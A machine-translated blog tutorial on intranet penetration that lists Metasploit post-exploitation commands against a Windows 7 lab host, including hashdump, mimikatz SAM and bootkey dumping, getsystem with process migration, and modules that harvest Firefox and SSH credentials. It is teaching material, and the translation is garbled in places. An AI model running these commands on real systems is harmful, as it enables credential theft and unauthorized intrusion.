当前位置:网站首页>Intranet information collection of Intranet penetration (3)
Intranet information collection of Intranet penetration (3)
2022-07-06 14:29:00 【Unknown white hat】
Catalog
Metasploit Intranet information collection
Ordinary users are entitled to
Intranet information collection of Intranet penetration ( Four )_ Unknown white hat blog -CSDN Blog
Metasploit Intranet information collection
attack kali 192.168.0.103
Drone aircraft win7 192.168.0.105
07 Password cracking
use post/windows/gather/hashdump //system The powers of the meterpreter
set session 1
exploit // The results are stored in tmp Under the table of contents
use post/windows/gather/smart_hashdump
set session 1
exploit
Format
User name :RID:LM-HASH value :NT-HASH value
rid yes windows The system account corresponds to a fixed value , Be similar to linux Of uid,gid Number ,500 by administartor,501 by guest etc. . and lm-hash and nt-hash, They all encrypt user passwords , But the encryption method is different
hashdump It uses mimikatz Part of the function of
load mimikatz
wdigest、kerberos、msv、ssp、tspkg、livessp
mimikatz_command -h
mimikatz_command -f a:: // Query which modules are available
mimikatz_command -f samdump::hashes
mimikatz_command -f samdump::bootkey
Ordinary users are entitled to
getuid
View user permissions
hashdump
Need administrator's permission
getsystem
It's just that on the surface, it has obtained administrator permission , Do not have some real administrator privileges
ps
Check the process
getpid
View the current process
migrate
Process migration ( Migrate ordinary user processes to administrator user processes )
hashdump
08other
Determine whether the target host is a virtual machine :
run checkvm
Get the software installation information on the target host :
run post/windows/gather/enum_applications
Get the most recently accessed documents on the target host 、 Link information :
run post/windows/gather/dumplinks
View the target environment information :
run post/windows/gather/env
see firefox Account and password stored in :
run post/windows/gather/firefox_creds
see ssh Ciphertext information of account password 、 Certificate information :
run post/windows/gather/ssh_creds
边栏推荐
- 记一次api接口SQL注入实战
- 7-14 error ticket (PTA program design)
- Load balancing ribbon of microservices
- HackMyvm靶机系列(1)-webmaster
- 中间件漏洞复现—apache
- [paper reproduction] cyclegan (based on pytorch framework) {unfinished}
- 内网渗透之内网信息收集(三)
- [insert, modify and delete data in the headsong educator data table]
- Feature extraction and detection 14 plane object recognition
- 图书管理系统
猜你喜欢
Based on authorized access, cross host, and permission allocation under sqlserver
Solutions to common problems in database development such as MySQL
外网打点(信息收集)
HackMyvm靶机系列(4)-vulny
Attack and defense world misc practice area (GIF lift table ext3)
Interpretation of iterator related "itertools" module usage
Hackmyvm target series (7) -tron
Chain team implementation (C language)
How to understand the difference between technical thinking and business thinking in Bi?
Middleware vulnerability recurrence Apache
随机推荐
AQS details
JDBC transactions, batch processing, and connection pooling (super detailed)
HackMyvm靶机系列(5)-warez
captcha-killer验证码识别插件
How does SQLite count the data that meets another condition under the data that has been classified once
How to understand the difference between technical thinking and business thinking in Bi?
HackMyvm靶机系列(7)-Tron
攻防世界MISC练习区(SimpleRAR、base64stego、功夫再高也怕菜刀)
网络层—简单的arp断网
Strengthen basic learning records
Harmonyos application development -- address book management system telmanagesys based on listcontainer [phonebook][api v6]
循环队列(C语言)
Uibutton status exploration and customization
Attach the simplified sample database to the SQLSERVER database instance
The difference between layer 3 switch and router
《统计学》第八版贾俊平第七章知识点总结及课后习题答案
[MySQL table structure and integrity constraint modification (Alter)]
搭建域环境(win)
XSS之冷门事件
7-5 staircase upgrade (PTA program design)